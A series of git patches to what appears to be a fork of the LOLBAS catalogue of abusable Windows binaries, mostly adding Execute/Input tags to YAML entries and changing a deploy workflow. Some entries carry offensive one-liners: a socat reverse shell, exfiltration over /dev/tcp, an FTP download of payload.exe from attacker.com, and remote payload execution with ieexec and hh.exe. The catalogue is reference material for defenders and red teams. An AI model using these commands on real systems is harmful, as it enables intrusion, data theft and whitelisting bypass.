From 8715370aa8663be2c0964b256ac6797109a31872 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 10:51:15 +0200 Subject: [PATCH 001/148] Update gh-pages.yml --- .github/workflows/gh-pages.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/workflows/gh-pages.yml b/.github/workflows/gh-pages.yml index c9ce872f..b053a7c1 100644 --- a/.github/workflows/gh-pages.yml +++ b/.github/workflows/gh-pages.yml @@ -1,5 +1,5 @@ --- -name: Update LOLBAS-Project.github.io +name: Update LOLBAS-Project-hegusung.github.io on: workflow_run: workflows: ["PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks"] @@ -21,11 +21,11 @@ jobs: mv yml/OSScripts yml/Scripts rm -r yml/HonorableMentions - - name: Deploy to LOLBAS-Project.github.io repo + - name: Deploy to LOLBAS-Project-hegusung.github.io repo uses: peaceiris/actions-gh-pages@v3 with: deploy_key: ${{ secrets.ACTIONS_DEPLOY_KEY }} - external_repository: LOLBAS-Project/LOLBAS-Project.github.io + external_repository: hegusung/LOLBAS-Project-hegusung.github.io publish_branch: master publish_dir: yml destination_dir: _lolbas From 679b321c343f15bd6ad4e0fe7010ad3dee6593e0 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 11:00:02 +0200 Subject: [PATCH 002/148] Update gh-pages.yml --- .github/workflows/gh-pages.yml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) diff --git a/.github/workflows/gh-pages.yml b/.github/workflows/gh-pages.yml index b053a7c1..d3d3f7e3 100644 --- a/.github/workflows/gh-pages.yml +++ b/.github/workflows/gh-pages.yml @@ -1,6 +1,25 @@ --- name: Update LOLBAS-Project-hegusung.github.io on: + workflow_dispatch: + inputs: + logLevel: + description: 'Log level' + required: true + default: 'warning' + type: choice + options: + - info + - warning + - debug + tags: + description: 'Test scenario tags' + required: false + type: boolean + environment: + description: 'Environment to run tests against' + type: environment + required: true workflow_run: workflows: ["PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks"] types: [completed] From 0795916fba11963fa8b5a77e31a2883cebc567a2 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 11:04:50 +0200 Subject: [PATCH 003/148] Update gh-pages.yml --- .github/workflows/gh-pages.yml | 18 ------------------ 1 file changed, 18 deletions(-) diff --git a/.github/workflows/gh-pages.yml b/.github/workflows/gh-pages.yml index d3d3f7e3..0e3d285c 100644 --- a/.github/workflows/gh-pages.yml +++ b/.github/workflows/gh-pages.yml @@ -2,24 +2,6 @@ name: Update LOLBAS-Project-hegusung.github.io on: workflow_dispatch: - inputs: - logLevel: - description: 'Log level' - required: true - default: 'warning' - type: choice - options: - - info - - warning - - debug - tags: - description: 'Test scenario tags' - required: false - type: boolean - environment: - description: 'Environment to run tests against' - type: environment - required: true workflow_run: workflows: ["PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks"] types: [completed] From 56ad2e75935bcaf0b3e7cd251f4530f92671a95b Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 11:11:44 +0200 Subject: [PATCH 004/148] Update Installutil.yml Changed tags Execute DLL to Execute .NetDLL Added Execute: .NetEXE tag --- yml/OSBinaries/Installutil.yml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml index 40d9a442..a5868cab 100644 --- a/yml/OSBinaries/Installutil.yml +++ b/yml/OSBinaries/Installutil.yml @@ -12,7 +12,8 @@ Commands: MitreID: T1218.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL + - Execute: .NetDLL + - Execute: .NetEXE - Input: Custom Format - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll Description: Execute the target .NET DLL or EXE. @@ -22,7 +23,8 @@ Commands: MitreID: T1218.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL + - Execute: .NetDLL + - Execute: .NetEXE - Input: Custom Format - Command: InstallUtil.exe https://example.com/payload Description: It will download a remote payload and place it in INetCache. From 0e177e7d6e1965abdfa69298db742bf90bc1efa0 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 11:14:41 +0200 Subject: [PATCH 005/148] Update gh-pages.yml --- .github/workflows/gh-pages.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/gh-pages.yml b/.github/workflows/gh-pages.yml index 0e3d285c..b3545131 100644 --- a/.github/workflows/gh-pages.yml +++ b/.github/workflows/gh-pages.yml @@ -10,7 +10,7 @@ on: jobs: build: runs-on: ubuntu-latest - if: ${{ github.event.repository.fork == false && github.event.workflow_run.conclusion == 'success' }} + if: ${{ github.event.workflow_run.conclusion == 'success' }} steps: - uses: actions/checkout@v2 From e5731033b2f8e8d68df52bf0c37e566924c407c9 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 11:50:14 +0200 Subject: [PATCH 006/148] Update Addinutil.yml Tags added: - .NetObjects - Fixed Format --- yml/OSBinaries/Addinutil.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yml/OSBinaries/Addinutil.yml b/yml/OSBinaries/Addinutil.yml index 909f7aa5..7f188467 100644 --- a/yml/OSBinaries/Addinutil.yml +++ b/yml/OSBinaries/Addinutil.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: .NetObjets + - Input: Fixed Format Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe From 58d2f4c79c478ef5b179405b2c5b36118825b5b0 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 11:55:20 +0200 Subject: [PATCH 007/148] Update At.yml Added tags - Execute: EXE - Input: Custom Format --- yml/OSBinaries/At.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yml/OSBinaries/At.yml b/yml/OSBinaries/At.yml index eb9743cc..2c1c1ed7 100644 --- a/yml/OSBinaries/At.yml +++ b/yml/OSBinaries/At.yml @@ -11,6 +11,9 @@ Commands: Privileges: Local Admin MitreID: T1053.002 OperatingSystem: Windows 7 or older + Tags: + - Execute: EXE + - Input: Custom Format Full_Path: - Path: C:\WINDOWS\System32\At.exe - Path: C:\WINDOWS\SysWOW64\At.exe From a199ff5deb761bb9a8738dd14f27aff12b7f941f Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 11:59:14 +0200 Subject: [PATCH 008/148] Update Atbroker.yml Added the following tags: - Execute: EXE - Input: Custom Format --- yml/OSBinaries/Atbroker.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yml/OSBinaries/Atbroker.yml b/yml/OSBinaries/Atbroker.yml index dff33688..99c1efbc 100644 --- a/yml/OSBinaries/Atbroker.yml +++ b/yml/OSBinaries/Atbroker.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE + - Input: Custom Format Full_Path: - Path: C:\Windows\System32\Atbroker.exe - Path: C:\Windows\SysWOW64\Atbroker.exe From 6d4ac1c6806e03e880f64007a59faccdd94feddd Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 12:02:27 +0200 Subject: [PATCH 009/148] Update Bash.yml Added tags: - Execute: CMD - Input: Custom format --- yml/OSBinaries/Bash.yml | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/yml/OSBinaries/Bash.yml b/yml/OSBinaries/Bash.yml index d257f752..87d29639 100644 --- a/yml/OSBinaries/Bash.yml +++ b/yml/OSBinaries/Bash.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 + Tags: + - Execute: CMD + - Input: Custom Format - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane" Description: Executes a reverseshell Usecase: Performs execution of specified file, can be used as a defensive evasion. @@ -18,6 +21,9 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 + Tags: + - Execute: CMD + - Input: Custom Format - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24' Description: Exfiltrate data Usecase: Performs execution of specified file, can be used as a defensive evasion. @@ -25,6 +31,9 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 + Tags: + - Execute: CMD + - Input: Custom Format - Command: bash.exe -c calc.exe Description: Executes calc.exe from bash.exe Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting. @@ -32,6 +41,9 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 + Tags: + - Execute: CMD + - Input: Custom Format Full_Path: - Path: C:\Windows\System32\bash.exe - Path: C:\Windows\SysWOW64\bash.exe From 31233018022bb961d3c258162a8fe80e74409d9d Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 12:06:18 +0200 Subject: [PATCH 010/148] Update Certoc.yml Added Tags: - Input: CustomFormat --- yml/OSBinaries/Certoc.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/yml/OSBinaries/Certoc.yml b/yml/OSBinaries/Certoc.yml index 34b5c3f5..1698354f 100644 --- a/yml/OSBinaries/Certoc.yml +++ b/yml/OSBinaries/Certoc.yml @@ -13,6 +13,7 @@ Commands: OperatingSystem: Windows Server 2022 Tags: - Execute: DLL + - Input: Custom Format - Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1 Description: Downloads text formatted files Usecase: Download scripts, webshells etc. From 654685344666dfa8461d9b5ac4b40639961c22df Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 12:16:28 +0200 Subject: [PATCH 011/148] Update Cmstp.yml Tags: Changed Input: INF to Execute INF for consistency Inout: Customformat added --- yml/OSBinaries/Cmstp.yml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index 903ec737..3a91d247 100644 --- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml @@ -12,7 +12,8 @@ Commands: MitreID: T1218.003 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Input: INF + - Execute: INF + - Input: Custom Format - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Usecase: Execute code hidden within an inf file. Execute code directly from Internet. @@ -21,7 +22,8 @@ Commands: MitreID: T1218.003 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - - Input: INF + - Execute: INF + - Input: Custom Format Full_Path: - Path: C:\Windows\System32\cmstp.exe - Path: C:\Windows\SysWOW64\cmstp.exe From bb484e278e2b6110367069bfe4a98cf7761271d7 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 12:19:14 +0200 Subject: [PATCH 012/148] Update Conhost.yml Execute and Input Tags added --- yml/OSBinaries/Conhost.yml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/yml/OSBinaries/Conhost.yml b/yml/OSBinaries/Conhost.yml index 2ee2b75c..c0b49723 100644 --- a/yml/OSBinaries/Conhost.yml +++ b/yml/OSBinaries/Conhost.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE + - Input: Custom Format - Command: "conhost.exe --headless calc.exe" Description: Execute calc.exe with conhost.exe as parent process Usecase: Specify --headless parameter to hide child process window (if applicable) @@ -18,6 +21,9 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE + - Input: Custom Format Full_Path: - Path: c:\windows\system32\conhost.exe Detection: From 2bf4516881c9ef4c84702274d32cf9ac05ced1a1 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 12:26:15 +0200 Subject: [PATCH 013/148] Update Control.yml Added Execution section to Control.exe Added tags: - Input Custom Format --- yml/OSBinaries/Control.yml | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/yml/OSBinaries/Control.yml b/yml/OSBinaries/Control.yml index 7f4e162a..4ebd8813 100644 --- a/yml/OSBinaries/Control.yml +++ b/yml/OSBinaries/Control.yml @@ -13,6 +13,17 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL + - Input: Custom Format + - Command: control.exe c:\windows\tasks\evil.cpl + Description: Execute evil.cpl payload. A CPL is a DLL file with CPlApplet export function) + Usecase: Use to execute code and bypass application whitelisting + Category: Execution + Privileges: User + MitreID: T1218.002 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL + - Input: Custom Format Full_Path: - Path: C:\Windows\System32\control.exe - Path: C:\Windows\SysWOW64\control.exe From 20ff06dd26e4fd33854b0b5ce070a0ac0bb712cb Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 12:33:41 +0200 Subject: [PATCH 014/148] Update Cscript.yml Tags Added Input tag --- yml/OSBinaries/Cscript.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/yml/OSBinaries/Cscript.yml b/yml/OSBinaries/Cscript.yml index 129672d6..3f9d3527 100644 --- a/yml/OSBinaries/Cscript.yml +++ b/yml/OSBinaries/Cscript.yml @@ -13,6 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: WSH + - Input: Custom Format Full_Path: - Path: C:\Windows\System32\cscript.exe - Path: C:\Windows\SysWOW64\cscript.exe From 7642b8cd86f7ae6a3bc706af4e2917bcbcb0d5a0 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 12:35:23 +0200 Subject: [PATCH 015/148] Update CustomShellHost.yml Tags Added Tags: - Execute EXE - Input Fixed Format --- yml/OSBinaries/CustomShellHost.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yml/OSBinaries/CustomShellHost.yml b/yml/OSBinaries/CustomShellHost.yml index 69d11cbf..16dd0b06 100644 --- a/yml/OSBinaries/CustomShellHost.yml +++ b/yml/OSBinaries/CustomShellHost.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE + - Input: Fixed Format Full_Path: - Path: C:\Windows\System32\CustomShellHost.exe Detection: From daee90f6cdfb368978c5a4708a0d589bcde46ee0 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 12:37:51 +0200 Subject: [PATCH 016/148] Update Dfsvc.yml Tags Added Tags: - Execute ClickOnce - Execute Remote - Input Custom Format --- yml/OSBinaries/Dfsvc.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OSBinaries/Dfsvc.yml b/yml/OSBinaries/Dfsvc.yml index 2a1cb9d1..c52a3a6f 100644 --- a/yml/OSBinaries/Dfsvc.yml +++ b/yml/OSBinaries/Dfsvc.yml @@ -11,6 +11,10 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: ClickOnce + - Execute: Remote + - Input: Custom Format Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe From 0c36af16d582e06ac7012c23a0a00c14f117924b Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 13:03:33 +0200 Subject: [PATCH 017/148] Update Diskshadow.yml Tags Added Tags: - Execute CMD - Input CustomFormat --- yml/OSBinaries/Diskshadow.yml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/yml/OSBinaries/Diskshadow.yml b/yml/OSBinaries/Diskshadow.yml index 7fb9a184..a3ddba27 100644 --- a/yml/OSBinaries/Diskshadow.yml +++ b/yml/OSBinaries/Diskshadow.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1003.003 OperatingSystem: Windows server + Tags: + - Execute: CMD + - Input: Custom Format - Command: diskshadow> exec calc.exe Description: Execute commands using diskshadow.exe to spawn child process Usecase: Use diskshadow to bypass defensive counter measures @@ -18,6 +21,9 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows server + Tags: + - Execute: CMD + - Input: Custom Format Full_Path: - Path: C:\Windows\System32\diskshadow.exe - Path: C:\Windows\SysWOW64\diskshadow.exe From 524ef3217365bea97f23ca8376e22284bd9e9708 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 13:05:06 +0200 Subject: [PATCH 018/148] Update Dnscmd.yml Tags Added Tags: - Execution: Remote - Input: Custom Format --- yml/OSBinaries/Dnscmd.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSBinaries/Dnscmd.yml b/yml/OSBinaries/Dnscmd.yml index 27f0d015..f4db3af5 100644 --- a/yml/OSBinaries/Dnscmd.yml +++ b/yml/OSBinaries/Dnscmd.yml @@ -13,6 +13,8 @@ Commands: OperatingSystem: Windows server Tags: - Execute: DLL + - Execute: Remote + - Input: Custom Format Full_Path: - Path: C:\Windows\System32\Dnscmd.exe - Path: C:\Windows\SysWOW64\Dnscmd.exe From ec76e9e49f32d56711d6f3afd9d6fb48273923d8 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 13:07:06 +0200 Subject: [PATCH 019/148] Update Explorer.yml Tags Added Tags: - Execute EXE - Input: Custom Format --- yml/OSBinaries/Explorer.yml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/yml/OSBinaries/Explorer.yml b/yml/OSBinaries/Explorer.yml index 829f2f89..f4885348 100644 --- a/yml/OSBinaries/Explorer.yml +++ b/yml/OSBinaries/Explorer.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE + - Input: Custom Format - Command: explorer.exe C:\Windows\System32\notepad.exe Description: Execute notepad.exe with the parent process spawning from a new instance of explorer.exe Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion. @@ -18,6 +21,9 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE + - Input: Custom Format Full_Path: - Path: C:\Windows\explorer.exe - Path: C:\Windows\SysWOW64\explorer.exe From 44a2e0c6e175a8476d7bf1b269c8583ca2782507 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 13:08:11 +0200 Subject: [PATCH 020/148] Update Extexport.yml Tags Added Tags: - Input CustomFormat --- yml/OSBinaries/Extexport.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/yml/OSBinaries/Extexport.yml b/yml/OSBinaries/Extexport.yml index c75e30a1..076343aa 100644 --- a/yml/OSBinaries/Extexport.yml +++ b/yml/OSBinaries/Extexport.yml @@ -13,6 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL + - Input: Custom Format Full_Path: - Path: C:\Program Files\Internet Explorer\Extexport.exe - Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe From 3db62fffdcd590389250164f270b79b4df158c0a Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 13:11:05 +0200 Subject: [PATCH 021/148] Update Forfiles.yml Tags Added Tags: - Execute EXE - Input: Custom Format --- yml/OSBinaries/Forfiles.yml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/yml/OSBinaries/Forfiles.yml b/yml/OSBinaries/Forfiles.yml index 51a084c3..8b771963 100644 --- a/yml/OSBinaries/Forfiles.yml +++ b/yml/OSBinaries/Forfiles.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE + - Input: Custom Format - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder. Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream @@ -18,6 +21,9 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE + - Input: Custom Format Full_Path: - Path: C:\Windows\System32\forfiles.exe - Path: C:\Windows\SysWOW64\forfiles.exe From d8c1def3507e9793b91aaa5fb5f655988dd1528b Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 13:12:20 +0200 Subject: [PATCH 022/148] Update Fsutil.yml Tags Added Tags: Execute: EXE Input: Fixed Format --- yml/OSBinaries/Fsutil.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yml/OSBinaries/Fsutil.yml b/yml/OSBinaries/Fsutil.yml index 63ef8591..5714d372 100644 --- a/yml/OSBinaries/Fsutil.yml +++ b/yml/OSBinaries/Fsutil.yml @@ -25,6 +25,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 11 + Tags: + - Execute: EXE + - Input: Fixed Format Full_Path: - Path: C:\Windows\System32\fsutil.exe - Path: C:\Windows\SysWOW64\fsutil.exe From eb06fb5266a0ba15a7277f4123934a7685f4054d Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 13:13:21 +0200 Subject: [PATCH 023/148] Update Ftp.yml Tags Added Tags: - Execute CMD - Input Custom Format --- yml/OSBinaries/Ftp.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yml/OSBinaries/Ftp.yml b/yml/OSBinaries/Ftp.yml index 62b9a828..21ea0a6f 100644 --- a/yml/OSBinaries/Ftp.yml +++ b/yml/OSBinaries/Ftp.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD + - Input: Custom Format - Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v" Description: Download Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary. From 4e60ead5f79fe81af653f37640d9889bcb47f6d4 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 13:15:50 +0200 Subject: [PATCH 024/148] Update Gpscript.yml Tags Added Tags: - Execute CMD - Input Fixed Format --- yml/OSBinaries/Gpscript.yml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/yml/OSBinaries/Gpscript.yml b/yml/OSBinaries/Gpscript.yml index fba5f6fe..0a5b355c 100644 --- a/yml/OSBinaries/Gpscript.yml +++ b/yml/OSBinaries/Gpscript.yml @@ -11,6 +11,9 @@ Commands: Privileges: Administrator MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD + - Input: Fixed Format - Command: Gpscript /startup Description: Executes startup scripts configured in Group Policy Usecase: Add local group policy logon script to execute file and hide from defensive counter measures @@ -18,6 +21,9 @@ Commands: Privileges: Administrator MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD + - Input: Fixed Format Full_Path: - Path: C:\Windows\System32\gpscript.exe - Path: C:\Windows\SysWOW64\gpscript.exe From bbe0681a9a02b52f423c4d8dd568c901c59d8704 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 13:24:23 +0200 Subject: [PATCH 025/148] Update Hh.yml Tags and Added command Added the command to execute remote CHM files Added Tags --- yml/OSBinaries/Hh.yml | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml index f6db4701..9d96358c 100644 --- a/yml/OSBinaries/Hh.yml +++ b/yml/OSBinaries/Hh.yml @@ -18,6 +18,20 @@ Commands: Privileges: User MitreID: T1218.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE + - Input: Custom Format + - Command: HH.exe http://some.url/payload.chm + Description: Executes a remote payload.chm file which can contain commands. + Usecase: Execute commands with HH.exe + Category: Execute + Privileges: User + MitreID: T1218.001 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD + - Execute: CHM + - Input: Custom Format Full_Path: - Path: C:\Windows\hh.exe - Path: C:\Windows\SysWOW64\hh.exe From 0a8785481dbb9d10211e19200443d4c17ca0c6af Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 13:26:30 +0200 Subject: [PATCH 026/148] Update Ie4uinit.yml Added Tags: Execute INF Input: Fixed Format --- yml/OSBinaries/Ie4uinit.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yml/OSBinaries/Ie4uinit.yml b/yml/OSBinaries/Ie4uinit.yml index 461fbca2..ae5dd4a9 100644 --- a/yml/OSBinaries/Ie4uinit.yml +++ b/yml/OSBinaries/Ie4uinit.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: INF + - Input: Fixed Format Full_Path: - Path: c:\windows\system32\ie4uinit.exe - Path: c:\windows\sysWOW64\ie4uinit.exe From 5210291b3cbe9f01e58f21f30e794f4ccf43a157 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 13:29:36 +0200 Subject: [PATCH 027/148] Update Iediagcmd.yml Tags Added Tags Execute EXE Input Fixed Format --- yml/OSBinaries/Iediagcmd.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yml/OSBinaries/Iediagcmd.yml b/yml/OSBinaries/Iediagcmd.yml index b1d47d4b..9d5ddcc6 100644 --- a/yml/OSBinaries/Iediagcmd.yml +++ b/yml/OSBinaries/Iediagcmd.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 1803, Windows 10 1703, Windows 10 22H1, Windows 10 22H2, Windows 11 + Tags: + - Execute: EXE + - Input: Fixed Format Full_Path: - Path: C:\Program Files\Internet Explorer\iediagcmd.exe Detection: From e8c0c77d7939d93e0058e71cbebfbcacc5fd20c4 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 13:31:56 +0200 Subject: [PATCH 028/148] Update Ieexec.yml Tags Added Tags: Execute .NetEXE Execute Remote Input Custom Format --- yml/OSBinaries/Ieexec.yml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/yml/OSBinaries/Ieexec.yml b/yml/OSBinaries/Ieexec.yml index 0987d2b1..43ba954d 100644 --- a/yml/OSBinaries/Ieexec.yml +++ b/yml/OSBinaries/Ieexec.yml @@ -11,6 +11,10 @@ Commands: Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + Tags: + - Execute: Remote + - Execute: .NetEXE + - Input: Custom Format - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe Description: Downloads and executes bypass.exe from the remote server. Usecase: Download and run attacker code from remote location @@ -18,6 +22,10 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + Tags: + - Execute: Remote + - Execute: .NetEXE + - Input: Custom Format Full_Path: - Path: 